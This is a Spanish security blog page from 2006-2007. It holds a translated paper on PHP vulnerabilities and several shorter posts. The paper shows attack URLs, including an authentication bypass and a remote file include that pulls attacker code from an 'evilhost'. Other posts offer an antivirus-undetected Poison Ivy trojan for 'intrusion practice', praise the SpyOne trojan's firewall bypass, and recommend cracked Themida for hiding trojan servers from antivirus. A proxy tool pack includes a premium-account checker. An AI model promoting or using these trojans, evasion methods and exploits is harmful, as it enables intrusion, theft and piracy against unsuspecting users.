Un blog mas de seguridad informatica

lunes, marzo 05, 2007

Vulnerabilidades comunes en aplicaciones escritas en PHP

<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

A Study In Scarlet
Vulnerabilidades comunes en aplicaciones escritas en PHP

Shaun Clowes
SecureReality

<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
Traducido al español por Di Biase Jos‚ Luis - josx@interorganic.com
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

--- < Contenido > --------------------------------------------------

1. Introducci¢n
2. Caveats y Alcance
3. Variables Globales
4. Archivos Remotos
5. Upload de Archivo
6. Librer¡as
7. Sesiones
8. Array asociativos y otros
9. Funciones que hay que utilizar con cuidado
10. Protegi‚ndose
11. Responsabilidad - Lenaguaje vs Programador
12. Otros

"I could imagine his giving a friend a little pinch of the latest vegetable
alkaloid, not out of malevolence, you understand, but simply out of a spirit
of inquiry in order to have an accurate idea of the effects." - Stamford

--- < 1. Introducci¢n > ----------------------------------------------------

Este investigaci¢n fue basada en la charla realizada durante BlackHat briefings
en Singapur y Hong Kong en abril del a¤o 2001. Esta charla fue titulada
"Breaking In Through the Front Door - The impact of Web Applications and
Application Service Provision on Traditional Security Models". Aqu¡ se invirti¢
un gran tiempo comentando acerca de PHP. Para lo que no sepan que es PHP, PHP
significa "PHP Hipertext Preprocessor". Es un lenguaje de programaci¢n (
dise¤ado especificamente para Internet ) en el cual PHP se embebe en las paginas
web. Cuando un Cliente hace un pedido a una pagina, el servidor web primero pasa
la pagina a un interprete de lenguaje que ejecuta el codigo, luego la pagina
resultado es enviada al cliente.

Obviamente esta aproximaci¢n esta mas relacionada con la naturaleza del paso de
una pagina a otra de una aplicaci¢n web que de un lenguaje CGI como C y Perl.
PHP ( y otros lenguaje para internet ) tienen la siguientes caracteristicas:
+ Interpretados
+ Ejecuci¢n R pida - El interprete esta dentro del servidor web, no fork() o
setup overhead.
+ Muchas Utilidades - Cientos de funciones no triviales incluidas.
+ Sintaxis simple - no se declaran variables y variable poco tipeadas.

Durante el transcurso de este escrito voy a tratar de explicar porque yo siento
estas ultimas dos caracteristicas las que hacen a las aplicaciones escritas en
PHP f cil de atacar y dificil para defender. Despu‚s voy a terminar con un
planteo acerca de la distribucion de culpas cuando se habla de seguridad del
software.

"You must study him, then ... you'll find him a knotty problem, though. I'll
wager he learns more about you than you about him." - Stamford

--- < 2. Caveats y Alcance > -----------------------------------------------

Casi todas la observaciones de este escrito se refieren a una instalaci¢n de PHP
4.0.4pl1 por default ( con soprte para Mysql, PostgreSQL, IMAP and OpenSSL )
corriendo bajo APACHE 1.3.19 en Linux. Esto quiere decir que el nivel lo que
ocurre puede variar particularmente, ya que muchas veces el comportamiento de
para la misma entrada es diferente en distintas versiones.

Adem s, los que apoyan PHP tienden a defender el lenguaje basandose en que es
totalmente configurable. Yo creo que la gran mayor¡a de usuarios no modifican la
configuraci¢n por default. Por esto no siento presi¢n en defender mi posici¢n
basada en las opciones de configuraci¢n, ademas inclui una secci¢n sobre como
defender las aplicaciones PHP usando esas configuraciones.

Algunas personas creen que esta clase de trabajo es Trivial o Obvio
particularmente desde el punto de vista que yo no discuto acerca de
vulnerabilidades especificas. Para probar que estos riesgos son reales y que
hasta los programadores que tratan caen en estos 4 detallados advisories.

"I have to be careful ... for I dabble with poisons a good deal." - Sherlock
Holmes

--- < 3. Variables Globales > ------------------------------------------------

Como mencionamos anteriormente, las variables en PHP no se declaran, son
automaticamente creadas la primera vez que se usan. Se les pone el tipo
automaticamente basada en contexto que son usadas. Esto es una forma muy
conveniente de hacer las cosas desde la perspectiva del programador ( y
obviamente es un herramienta escencial en un lenguaje de desarrllo de
aplicaciones rapido ). Una vez creadas las variables pueden ser referenciadas
desde cualquier parte del programa ( excepto en funciones donde debe ser
explicitamente incluida con el 'global' (funci¢n). El resultado de estas
caracter¡sticas es que las variables son casi nunca inicializadas por el
programador, despu‚s de todo, cuando son creadas est n vac¡as ( ej. "").

Obviamente el Main de una aplicaci¢n web basadas en PHP toma alguna entrada del
cliente ( variables de formulario, upload de archivos, cookiw etc),
Procesa la entrada y devuelve una salida basada en esa entrada. Para hacerlo lo
mas simple posible la entrada casi siempre es proveida en la forma de variables
globales. Como en este codigo html:

----



-----------------------------------

Esto mostrar un text box y un boton de submit. Cuando el usuario aprieta el
bot¢n de submit el script de PHP test.php se ejecuta para procesar la entrada.
Cuando se ejecuta la variable $hello contendr el texto que el usuario puso en
el text box. Es importante darse cuenta las implicaciones de esto £ltimo, esto
quiere decir que un atacante desde remoto puede crear cualquier variable que
desee y tenerla declarada como global. Si encambio de usar el form anterior para
llamar a test.php, el atacante llama directamente a la url como
"http://server/test.php?hello=hi&setup=no", no solo ser $hello="hi" cuando el
script se ejecute sino que $setup ser "no" tambi‚n.

Un ejemplo dde como esto puede ser realmente un problema real es en un script
que fue dise¤ado para autentificar a usuarios antes de mostrarlo informaci¢n
importante. Por ejemplo:

if ($pass == "hello")
$auth = 1;
...
if ($auth == 1)
echo "some important information";
?>

En una operaci¢n normal el c¢digo se fijar el password para decidir si el
usuario debe ser autentificado. Despu‚s se fija si ya fue autentificado y
muestra un informaci¢n importante. El problema radica en que el c¢digo
incorrectamente asume que la variable $auth estar vac¡a a menos que se llene
desde ah¡. Recordando que un atacante puede crear variables como globales, una
url como 'http://server/test.php?auth=1' haria que falle la autentificaci¢n del
password pero igualmente el script crea que estoy autentificado.

Para redondear lo anterior, un script PHP no puede confiar en ninguna variable
si no fue expl¡citamente asignada. Cuando uno tiene un gran numero de variables,
esto puede ser una tarea muy ardua.

Una aproximaci¢n para proteger un script es fijarse que variables no est n en el
array HTTP_GET/POST_VARS[] (dependiendo del m‚todo que se use para enviar el
formulario GET o POST ). Cuando se configura PHP con track_vars enabled ( como
lo es como default ) las variables enviadas por el usuarios estan disponibles en
dos lugares, como variables globales y tambi‚n como elementos de un array que
mencionamos anteriormenet. Igualmente, es importante darse cuenta de que hay
cuatro arrays diferentes para la entrada del usuario, HTTP_GET_VARS para las
variables enviadas en la URL de la pericion GET, HTTP_POST_VARS para las
variables enviadas de manera POST, HTTP_COOKIW_VARS para las variables enviadas
como parte del header de cookies y de una manera limitada el HTTP_POST_FILES (
en las versiones mas recientes de PHP ).
Un script seguro tiene que fijarse en los 4 arrays.


"No man burdens his mind with small matters unless he has some very good
reason for doing so." - John Watson

--- < 4. Archivos Remotos > ----------------------------------------------------

Voy a repetir esto con frecuencia durante este escrito, PHP es un lenguaje muy
rico, viene con una gran cantidad de funcionalidades y trata de hacerle la vida
f cil al programador para programar ( o dise¤ador web como a veces es ).
Desde la perspectiva de la seguridad, cuanto mas funcionalidad superflua ofrece
un lenguaje y menos intutitivas las posibilidades, se hace m s dificultoso
escribir aplicaciones seguras. Un exelente ejemplo de esto es la funcionalidad
de Archivos Remotos de PHP.

El codigo siguiente de PHP se utiliza para abrir un archivo:

if (!($fd = fopen("$filename", "r"))
echo("Could not open file: $filename
\n");
?>

El c¢digo abre un archivo especificado en la variable $filename para leerlo. Si
falla muestra un mensaje de error. Obviamente esto puede llegar a ser un
problema de seguridad si el usuario puede poner lo que quiera en $filename y por
ejemplo mostrar /etc/passwd, pero de otra forma poco intuitiva se puede leer
datos de otro sitio web/ftp. La funcionalidad de archivos remotos sirve
justamente para que con casi cualquier funci¢n de manejo de archivos de PHP
puede manejar transparentemente archivos remotos por HTTP and FTP. Si $filename
tendria:
(por ejemplo)
http://target/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir PHP har¡a una
petici¢n HTTP al server "destino", en este caso tratando de explotar la falla
unicode.

Esto es mas interesante con relaci¢n a otras 4 funciones que tiene incluida la
funcionalidad de archivos remotos (*** excepto en Window ***), include(),
require(), include_once() y require_once(). Estas funciones toman un archivo lo
leen, y lo parsean como c¢digo php. Son usadas la mayor¡a de las veces para
usar librer¡as (o bibliotecas), donde hay c¢digo php y se la incluye cuando se
la necesita.
Ahora mira el siguiente c¢digo:

include($libdir . "/languages.php");
?>

Aparentemente $libdir es una variable de configuraci¢n que ya hemos asignado
anteriormente en el c¢digo, que contiene el directorio en donde est n los
archivos de las librer¡as. Si el atacante puede hacer que la variable no la
asigne el script (lo que es una tarea no tan dificultosa) y en vez de hacer
submit puede modificar en comienzo del path. Esto no sirve para nada por que
solo tienen acceso a el archivo languages.php en el directorio que ellos elijan
( ataques del tipo poison null como en perl no funcionan con PHP) pero si pueden
grabar un archivo llamado languages.php en cualquier directorio conteniendo por
ejemplo:

passthru("/bin/ls /etc");
?>

despu‚s asignan $libdir a http:/// cuando php encuentra la sentencia
include php hace la petici¢n HTTP al evilhost, extrae el c¢digo del atacante y
lo ejecuta, d ndonos de esa manera un listado del /etc en el browser. Te t‚nes
que dar cuenta que el cliente quiz s no este ni corriendo php por que se ejecuta
el servidor remoto.



"There are no crimes and no criminals in these days" - Sherlock Holmes

Etiquetas: , ,

sábado, diciembre 09, 2006

Hay 10 acusaciones contra cracker rumano


A Victor Faur se le acusa de infiltrarse en más de 150 ordenadores de la Nasa, el Ministerio de Energía y la Marina de los EEUU.

Parece ser que durante los últimos dos años Victor y su "Equipo del Sombrero Blanco" se han dedicado a asaltar e infectar un gran número de ordenadores. Empezaban con el sencillo método prueba y error mediante un programa que probaba millones de posibilidades, para luego ganar privilegios dentro del sistema y pasar a otros ordenadores.

Según la denuncia los ordenadores eran infectados con programas que los convertían en huéspedes de chats en los que se conectaban los miembros del equipo de hackers.

La Nasa dice que el valor de los daños asciende a 1.4 millones dólares, mientras que en el Ministerio de Energía y la Marina de los EEUU tan solo son 100.000 dólares.

Parece ser que Faur ya había sido acusado de un delito similar por ls autoridades rumanas.

En este caso la condena podría ascender a 54 años de cárcel.

Fuente:
http://www.infobae.com/notas/nota.php?IdxSeccion=1&Idx=290101

OffiCat, detectando archivos de Office potencialmente peligrosos


OffiCat es una nueva herramienta gratuita para Windows, lanzada por la empresa norteamericana SourceFire, que a través de una consola de comando podemos averiguar si el archivo ofimático que poseamos pueda ser potencialmente peligroso.

Pero no temáis, ya que las intrucciones las tenéis en su sitio oficial. Se trata de una pequeña aplicación, de tan sólo 35 KB, que nos permitirá añadir mayor seguridad viendo lo fiable que pueda ser cualquier fichero ofimático antes de ser abierto por Microsoft Office.

Vía | Kriptópolis

GoogleHacker 2.1 [Tools]

Con esta tool aprenderas sobre las ultimas busquedas en google, estas busquedas son especiales, me refiero a que son para encontrar sistemas vulnerables a algun tipo de ataque, encontrar bases de datos, maillist, y muchas otras, la tool esta en su ultima version y contiene gran variedad de formulas de busqueda.


viernes, diciembre 08, 2006

¿Tienes un Pendrive?

Si tienes un pendrive tu mayor problema es el tener que darle el mismo uso siempre, claro eso solo te puede pasar si no has leido este articulo, sigue leyendo y descubriras que realmente puedes dar mucho mas uso a ese aparato que siempre llevas conigo o casi siempre xD.

-Software portable

Una aplicación portátil es un programa de ordenador que se puede copiar a un dispositivo portátil de almacenamiento, como por ejemplo una memoria USB, un iPod, o un reproductor MP3, luego, puede llevarse a cualquier sitio donde haya un ordenador (siempre que tenga el mismo sistema operativo para el que la aplicación fue creada) y puede usarse inmediatamente. Basta con insertar la memoria USB en el computador, buscar la aplicación, y ejecutarla. Las aplicaciones portátiles siguen la filosofía de los LiveCD, no hay necesidad de instalarla ni de modificar el contenido del disco duro del computador anfitrión de ninguna manera.

Dentro de las aplicaciones portátiles, tenemos programas de navegación de Internet, correo electrónico, procesador de palabras, hoja de cálculo, presentaciones gráficas, etc. Si además de las aplicaciones, copiamos nuestros archivos de datos, podemos llevarnos una "oficina" en la palma de la mano, y trabajar en cualquier computador a donde lleguemos.

No todas las aplicaciones informáticas son portátiles. Usualmente existe una versión normal de la aplicación (típicamente no portátil), y luego, ésta se modifica para crear una aplicación portátil. Por otro lado, hay aplicaciones que sin ser modificadas pueden ser usadas como aplicaciones para llevar, como eMule o Durie, ya que se distribuyen en un ejecutable y no necesitan ser instaladas sino solo copiarse a una carpeta, que bien podría estar en una memoria USB.

Aqui teneis un paquete pensado para memorias USB de 256 MB (aunque es recomendable 512MB).
Se llama Portable Apps Suite e incluye:

Portable Firefox (navegador) Portable Thunderbird (cliente email) Portable OpenOffice.org (suite ofimática) Portable AbiWord (procesador Word) Portable NVU (Web editor) Portable Sunbird (calendario y lista de tareas) Portable FileZilla (FTP cliente) Portable Gaim (mensajería instantánea)

Descarga


-Sistema operativo portable

MPVPM: Este producto de complicadisimo nombre es una aplicación que la gente de Metropipe.net distribuye libremente. El producto está construido a partir del emulador QEMU . Ellos han tomado el emulador y han creado una imagen de la ligera distribución DSL. Puesto que el emulador QEMU es ajecutable desde Windows sin instalación es perfecto para ser lanzado desde el pendrive.

Cuando nos descargamos el producto desde la pagina web en la sección de "productos" de la misma (aquí) y lo descomprimimos obtenemos los siguientes ficheros:
Si ejecutamos qemu-win.bat lanzamos el emulador que toma la imagen mydsl.iso y la carga como si de un sistema operativo normal se tratase. El contenido de qemu-win.bat es muy sencillo, le indica al emulador que fichero hace las veces de disco duro y cual hace las veces de cd-rom. Habilita el sonido y la red.

Al ejecutarlo se abre una ventana en la que vemos como se va cargando una distribución de linux.
Al terminar de arrancar tenemos un bonito escritorio con acceso directo a varias aplicaciones:

La mayoria de las aplicaciones son enfocadas al uso del equipo en la red ya que incorpora dos navegadores (Firefox, Dillo), dos clientes de correo electrónico (Thunderbird, Sylpheed) , un visor de pdf (xPDF), un reproductor multimedia (xZGV) y las mas comunes aplicaciones de toda distribucion (xterm, xpaint, emelfm etc.. ).

Además incluye gratuitamente el programa Metropipe Tunneler. Es un programa de la misma compañía que nos ha preparado este sistema y ofrece la posibilidad de navegar de forma privada por toda la red. Para ello encripta nuestro tráfico y lo hace pasar por una cadena de "proxies".

El conjunto no es tan lento como otras emulaciones y es una opción a tener en cuenta para aquellos que no quieren el Windows ni en pintura y se ven en la necesidad de navegar o leer su correo desde una maquina con el Sistema Operativo de Microsoft instalado.

Tambien sería de utilidad para gente que no ha visto nunca el sistema Linux y sienta curiosidad por su apariencia, su uso, el esquema de sus ficheros y carpetas etc...

Bueno esto ha sido todo otro dia os cuento algunas cosas mas.

Poison Ivy [Troyano]

Aqui os traigo un troyano de los que mas me gustan
su nombre es Poison Ivy, su aspecto dinamico y su facilidad
a la hora de usarlo son sus armas mas contundentes para
que lo usemos.

Para los que se inicien en las practicas de intrusiones os dejo una version "privada" segun dicen la saco una persona que pidio la version de pago al creador del troyano y se la quedo sin pagar, por el momento no es detectada por los antivirus mas usados, recordar que eso no durara mucho, si realmente quereis hacerlo indetectable debeis leer mucho y aprende sobre varios temas como offsets,firmas,arquitectura de los antivirus,compresores etc etc...

Descargas:
-Video explicativo Poison Ivy
-Poison ivy "privado"

Enlaces adicionales:
-Manual no-ip (por si no podeis abrir los puertos del router)
-Manual Poison Ivy

martes, diciembre 05, 2006

Themida 1.0.8

Aqui teneis una nueva version crackeada. no se si recordais cuando ya os hable sobre este software.


Descargar Themida 1.0.8

lunes, diciembre 04, 2006

Descargar videos del youtube

Tantas preguntas para una sola respuesta: VideoDownloader Firefox Plugin

¿Estás cansado de tener que copiar y pegar la dirección de cada página para poder bajar un video? Ahora es incluso más fácil !

El plugin para Firefox de VideoDownloader añade un pequeño icono en la barra de estado, en la parte inferior del navegador, y un botón en la barra de herramientas de navegación.
Simplemente haz clic en dicho icono o botón, desde la página donde estés viendo el video, y se descargará automáticamente !

jueves, noviembre 30, 2006

Cuando los votos se hacen bits, un virus puede decidir quien gana

Crece en Estados Unidos y Europa la preocupación por la seguridad de
la votación electrónica

Por Mercè Molist


¿Podría un equipo de doce hackers cambiar el rumbo de unas elecciones? La respuesta es sí, según un estudio del Brennan Center sobre votación electrónica. Cuando las papeletas se transforman en bits, los riesgos de la seguridad informática, como intrusos, virus y troyanos, entran en el juego democrático.

En las recientes elecciones en Estados Unidos, donde el 39% de la
población usó máquinas de votación electrónica, se perdieron 18.000
votos en el distrito 13 de Florida. Una cuestión peliaguda, en un
estado donde el candidato republicano ganó al demócrata por 373 votos.

¿Dónde están los 18.000 perdidos? En unas máquinas que no tenían
sistema de "back-up" ni daban recibos en papel por voto emitido, lo
que imposibilita un recuento. La propia cifra de 18.000 votos
desaparecidos es sólo una aproximación, en base a la participación
en otros distritos.

Es lo que tiene el fraude en la votación electrónica: no deja
huella. Lo explica el investigador Jon Stokes en su estudio "Cómo
robar una elección hackeando el voto": "Se puede alterar la
tabulación de votos, el registro de los mismos y también el recuento
de formas indetectables".

Los fallos de "software" que retrasaron la apertura de algunas mesas
y recuentos fueron la norma en las elecciones norteamericanas. Lo
anormal sucedía en Pennsylvania, con el fenómeno bautizado como
"vote flipping" (voto saltarín): el elector escogía a un candidato y
el ordenador marcaba a su contrario.

O en Maryland, donde la máquina aseguraba al votante que ya había
votado, cuando aún estaba en el proceso. Nadie sabe cuántas personas
insistieron, en cuántas ocasiones el ordenador no contó su voto y en
cuántas lo contó dos o tres veces. O el candidato a alcalde en el
pequeño pueblo de Poinsett que se votó a sí mismo, pero la máquina
le asignó cero votos.

Después de las elecciones, el experto en seguridad Bruce Schneier
denunciaba: "Las máquinas están "protegidas" con llaves de minibar
de hotel. El "software" está mal diseñado. Los votos computados se
guardan en archivos fácilmente manipulables. Las máquinas pueden ser
infectadas con virus. Algunas funcionan con Windows, con todos los
fallos de seguridad que conlleva".

Recientemente, un grupo de hackers holandeses demostraba que las
máquinas de votación electrónica que empiezan a usarse en Europa son
también inseguras. En un programa de televisión, mostraron como las
Nedap ES3B, que han adquirido Irlanda, Alemania, Francia, Gran
Bretaña, Holanda y Dinamarca, podían reprogramarse para jugar al
ajedrez, o espiar a 25 metros de distancia los votos que se les
introducían.

El servicio secreto danés reaccionó retirando 1.200 máquinas. Pero
no de la marca Nedap, que representa el 90% de equipos para la
votación electrónica en aquel país, sinó de la empresa holandesa
Sdu. La también holandesa Nedap prometió en un comunicado enmendar
los fallos detectados.

Estos incidentes pueden achacarse a simples errores. Pero cada vez
más voces avisan contra ellos, porque facilitan los fraudes
intencionados. Al acabar las elecciones norteamericanas, la
organización Electronic Frontier Foundation reclamaba un cambio
legislativo que obligue a los fabricantes a someterse a auditorías
independientes y hacer público el código de sus programas.

El estudio "La maquinaria de la democracia: protegiendo las
elecciones en un mundo electrónico", del Brennan Center, va más allá
y, con la ayuda de expertos de todo el mundo, dilucida si sería
posible cambiar el rumbo de unas elecciones, manipulando las
principales máquinas en uso en Estados Unidos: Sequoia, Diebold y
Election Systems & Software.

Su conclusión es que sería suficiente con un grupo de doce personas.
Los expertos detectaron 120 formas de sabotaje a las que son
vulnerables estos aparatos: "Lo más fácil sería introducir un
programa troyano, cuando la máquina está en la fábrica o a través de
sus conexiones inalámbricas, que infectase a las otras y se
autodestruyese, acabada la tarea".

Informáticos y asociaciones de derechos civiles aseguran que no es
ciencia-ficción. El vídeo "Hacking Democracy", de la organización
Black Box Voting, muestra cómo se puede reconfigurar fácilmente una
máquina Diebold o manipular el archivo donde guarda los votos. Nada
está cifrado y no quedan trazas de la manipulación.

Tampoco es imposible que alguien manipule los programas cuando la
máquina está aún en la fábrica. En los últimos años, Diebold ha
sufrido diversos accesos no autorizados a sus redes, robos de
documentos e incluso del código de sus programas.

Jon Stokes asegura: "Internet está llena de documentos que explican
vulnerabilidades de estas máquinas y cómo explotarlas. Antes, sólo
debíamos confiar en el Comité Electoral para tener unas elecciones
limpias. Ahora, debemos confiar en la empresa que ha fabricado la
máquina, en sus trabajadores y en cualquier tercera parte que toque
el "software"".

Pere Vallès, consejero delegado de la empresa Scytl, especializada
en votación electrónica, afirma: "Estas empresas lo han hecho muy
mal, por su poca seguridad y el hecho de ser sistemas cerrados, como
una caja negra. Son muy vulnerables y, potencialmente, se podrían
cambiar unas elecciones manipulando estas máquinas".

Vallès considera que "el voto electrónico no debería eliminarse sino
hacerse con transparencia", aunque no ve mercado para las máquinas
en Europa: "Tiene sentido en Estados Unidos, porque el sistema
electoral es muy complicado. Lo que nosotros necesitamos es subir la
participación y dar un uso al DNI digital, para lo que el voto por
Internet es mejor".

Suiza es el país pionero en voto por Internet. Un 60% de la población ha votado así este año. Pero en España queda un largo camino para usar la red o máquinas de voto electrónico en unas elecciones generales, afirma Vallès: "Primero, hay que cambiar la
ley electoral, que es una ley orgánica y un tema muy delicado, lo que significa que deben ponerse todos de acuerdo. Hay para rato".

miércoles, noviembre 29, 2006

Videos Seguridad Informatica [PACK]

Borre sus huellas en la Red


Windows guarda datos sobre sus actividades en Internet, desde la navegación por sitios prohibidos hasta sus charlas secretas. Elimine la evidencia.

Internet, al igual que la luna llena, ejerce un influjo poderoso y oscuro sobre la mayoría de personas. Al primer indicio de soledad en la oficina, cualquier empleado con acceso a la Red aprovechará la conexión de banda ancha para buscar fotografías y videos prohibidos, navegar en sitios poco recomendables y descargar juegos y canciones que le servirán luego de entretención.

Por desgracia, Windows guarda datos de todo cuanto se hace en la Red, y las andanzas de los usuarios por los más bajos rincones del ciberespacio quedan registradas en alguna parte del PC, listas para ser descubiertas por cualquiera con el conocimiento suficiente.

Por esa razón, es recomendable borrar siempre las huellas. Eso no solamente le ahorrará problemas cada final de año, cuando el personal técnico de su oficina haga el inventario de software del PC, sino que también evitará que su información personal caiga en manos equivocadas si cambia de trabajo o si debe entregar el PC o el portátil a la empresa.

Con estas cuatro tareas, usted podrá dormir más tranquilo de ahora en adelante:

El historial delator

El programa de navegación Internet Explorer cuenta con una herramienta denominada Historial, que almacena todos los sitios web visitados en las últimas semanas.

Se trata de un instrumento muy útil, especialmente si usted olvida con facilidad los nombres de sus sitios web favoritos, pero resulta problemático si suele recorrer con frecuencia páginas indebidas.

Para que el navegador no lo deje en evidencia, abra el programa, dé clic en el menú Herramientas, seleccione ‘Opciones de Internet’ y dé clic en la pestaña General del cuadro Opciones de Internet. En la sección Historial, dé clic en ‘Borrar historial’ y escoja ‘Sí’ cuando el programa le pregunte si desea confirmar esa acción.

En caso de que no quiera que Internet Explorer almacene la lista de sitios recorridos, en la misma parte cambie a cero el número en ‘Días que puede guardar las páginas en historial’. Para finalizar, dé clic en Aceptar.

Archivos descargados

A medida que navega, y sin que usted lo note, Internet Explorer guarda en su PC archivos provenientes de los sitios web que visita, como imágenes, botones, etc. Estos también lo pueden incriminar.

Para borrarlos, abra de nuevo el cuadro Opciones de Internet y dé clic en el botón ‘Eliminar archivos’ en la sección ‘Archivos temporales de Internet’.

Para deshacerse completamente de las huellas, marque el cuadro ‘Eliminar todo el contenido sin conexión’ y dé clic en Aceptar. El computador tomará unos segundos para borrar los archivos antes de permitirle dar clic en Aceptar.

‘Galletas’ virtuales

El propósito principal de unos pequeños archivos llamados cookies (galletas) es que los sitios web puedan identificar a los visitantes frecuentes con el fin de personalizar las páginas para que les resulten más útiles.

Cuando usted visita un sitio con cookies (Amazon, Hotmail y Yahoo, entre otros), probablemente le sean solicitados datos como su nombre y sus temas de interés. Esa información queda en la base de datos del sitio web, pero la cookie, que se almacena en su PC, es el que permite al sitio web identificarlo y asociar los datos con usted.

De esa manera, es posible crear una especie de ‘historial clínico’ de cada usuario, algo que se usa para mostrarle contenido personalizado o avisos que se ajusten más a sus gustos y necesidades.

Por ejemplo, si usted recorre por primera vez Amazon y busca ediciones recientes de El Quijote de la Mancha, la tienda en línea le ofrecerá información sobre nuevas versiones del libro cada vez que entre, hasta que deje de ser su tema favorito.

Eso no es malo; el problema es que cualquier persona que use su PC puede revisar la carpeta de los cookies para saber qué sitios se han visitado. Allí suele figurar el nombre del sitio y la dirección. Así las cosas, es recomendable borrar de vez en cuando estos elementos si quiere mantener privadas sus actividades en Internet.

Para ello, vuelva al cuadro ‘Opciones de Internet’ y dé clic en el botón ‘Eliminar cookies’.

Mensajes peligrosos

Pocas cosas favorecen niveles de intimidad tan altos como los programas de mensajería instantánea. A través de ellos, los usuarios se confiesan su amor, intercambian todo tipo de opiniones y desnudan el alma.

Por eso, es recomendable evitar cualquier rastro que pueda quedar de las conversaciones realizadas a través de aplicaciones como MSN Messenger, de Microsoft, que es el programa de mensajería más popular del mundo, con más de 110 millones de usuarios, según datos de la firma investigadora de mercados Nielsen NetRatings.

Aunque como opción predeterminada MSN Messenger no almacena las charlas, asegúrese de que así sea abriendo el menú de herramientas del programa y dando clic en ‘Opciones’.

Una vez allí, seleccione la pestaña Mensajes y el ‘Historial de mensajes’. Revise que no esté marcada la opción ‘Guardar automáticamente un historial de mis conversaciones’.

En caso de que descubra que sus diálogos íntimos están siendo almacenados, revise la ruta configurada en el cuadro ‘Guardar mis conversaciones en esta carpeta’.

Abra el explorador de Windows y encuentre la carpeta en cuestión para eliminarla y poner a salvo su pasado. Finalmente, dé clic en ‘Aceptar’ y dedíquese a conversar con sus contactos con la certeza de que nadie conocerá sus secretos.

Articulo escrito por: DIEGO CAMARGO

Como ocultar nuestra ip

Primero ¿Qué es un Proxy?
Bueno un Proxy en esencia es un servidor que se interpone entre ud y el servidor al que vas a ingresar.Navegación sin Proxy
UD ===> Servidor

Navegación con Proxy
UD===> PROXY ===> Servidor

Como veis en el Servidor cuando se navega SIN PROXY la ip suya es la que aparece en los logs de este, sin embargo cuando se usa un servidor PROXY la ip de este es el que aparece en el servidor.

Bueno ahora vamos a la práctica.

¿Dónde consigo un servidor Proxy?

http://www.proxylists.net/http_highanon.txt
Ami me gusta conseguirlos en esta web por 2 motivos.
1º Son en texto plano
2º me gustan sin mas xD

Una vez tenemos los proxis procedemos a verificar que Proxy están buenos, con esta herramienta
http://www.proxychecker.net/onlinechecker/checkproxy.shtml

Una vez el chequeo nos arroje proxys en buen estado solamente tenemos que meterlos en donde lo necesitemos x ejemplo nuestro navegador, herramienta de escaneo, gestor de descargas etc..

Algunos ejemplos:

Para usar el Proxy con el Internet Explorer
Herramientas/opciones de Internet/conexiones/configurar lan/ pulsamos en utilizar Proxy y metemos la ip y puerto, luego aceptar y listo

Para usarlo con el Mozilla Firefox
Herramientas/opciones/configurar conexión/configuración manual de Proxy/ pulsamos en utilizar el mismo proxy para todos los protocolos y metemos la ip y puerto, luego aceptar y listo

Para RapGet (descargar de rapidshared, megaupload, uploagin, etc..) (RapGet.com)
Ajustes/Proxy/ pulsamos en usar, ingresamos la ip y el puerto y le damos en OK

No solo existen esta clase de proxys, también existen de tipo SOCKS4 y SOCKS5 ademas de los muy populares webproxys que por lo general tienen una velocidad un poco mayor pero no es posible utilizarla en aplicaciones tipo RapGet.

Algunos de estos son:
anonycat.com
www.hidemyass.com
www.proxy7.com
www.proxyfoxy.com
www.78y.net
www.75i.net
www.proxyz.be
www.freeproxy.ru/en/free_proxy/cgi-proxy.htm

Un saludo.

Proxi Tools [PACK]

Contenido:
1. Athena
2. Lucifer
3. Proxessor v1.82
4. Proxessor v1.02
5. Combressor v1.61
6. Charon v0.6
7. StAPH v1.23
8. RapidShare Premium Account Checker v1.2
9. ProxyGrab v0.5
10. Z-Leecher v1.0
Download
http://rapidshare.com/files/4778504/Proxy___Wordlist_Tools.zip.html

SpyOne 1.0 (español)

Estupendo Troyano, extremadamente estable, bypass de firewall actual, Se hace indetectable con casi cualquier compresor-encriptador mas o menos potable, fácil de manejar.


THEMIDA 1.7 FULL

Themida proporcionar una protección fiable y segura a nuestras aplicaciones difícilmente podía ser más sencillo gracias a programas como Themida.

Dispone de una tecnología propia a la que denomina SecureEngine, que ejecuta partes del código al mismo nivel de prioridad que el Sistema operativo lo que le permite supervisar y controlar las aplicaciones ejecutadas (esto incluye los desensambladores y otras herramientas usadas en la tecnología inversa).

Se puede configurar las protecciones que queremos aplicar a nuestra aplicación, ofreciendo más de diez protecciones distintas: contra el volcado de memoria, unidades virtuales, encriptación de recursos, ofuscación, etc.

Sin embargo, a pesar de los complejos sistemas de protección que utiliza, el programa en sí es bastante sencillo de usar, pues básicamente consiste en elegir el ejecutable a proteger y elegir las protecciones que se le van a aplicar, permitiéndonos personalizar los mensajes de error e información.

Nota:Muy bueno para dejar los server de los troyanos indetectables ante los AV(Antivirus).

DESCARGAR THEMIDA 1.7 FULL

El TOP 20 de vulnerabilidades de Internet

El SANS Institute ha actualizado su Top 20 de las vulnerabilidades más críticas de Internet y que son más frecuentemente explotadas.

La primera lista, que contenía las 10 vulnerabilidades más críticas, fué confeccionada hace cuatro años por el SANS Institute, el FBI y el NIPC.

En esta revisión, la 7.0, se han elaborado varias listas, con varias vulnerabilidades cada una:

TOP 20 de SANS, de 15 de Noviembre, quedando la lista de vulnerabilidades de esta forma:

Cross-Platform Applications
C1 Web Applications
C2. Database Software
C3. P2P File Sharing Applications
C4 Instant Messaging
C5. Media Players
C6. DNS Servers
C7. Backup Software
C8. Security, Enterprise, and Directory Management Servers

Network Devices
N1. VoIP Servers and Phones
N2. Network and Other Devices Common Configuration Weaknesses

Security Policy and Personnel
H1. Excessive User Rights and Unauthorized Devices
H2. Users (Phishing/Spear Phishing)
Special Section
Z1. Zero Day Attacks and Prevention Strategies

Finalmente destacar que en el apartado de sistemas operativos, Windows vuelve a ganar por goleada:

W1. Internet Explorer
W2. Windows Libraries
W3. Microsoft Office
W4. Windows Services
W5. Windows Configuration Weaknesses
M1. Mac OS X
U1. UNIX Configuration Weaknesses

Fuente:
http://www.sans.org/top20

Vulnerabilidad en Firefox ayuda a revelar contraseñas

Acaba de ser descubierta una grave vulnerabilidad en la versión estable de Firefox que puede ser empleada para desvelar las contraseñas de sus usuarios.
La vulnerabilidad posibilita la aparición de un nuevo tipo de ataque, que sus descubridores han bautizado como vulnerabilidad RCSR (Reverse Cross-Site Request).

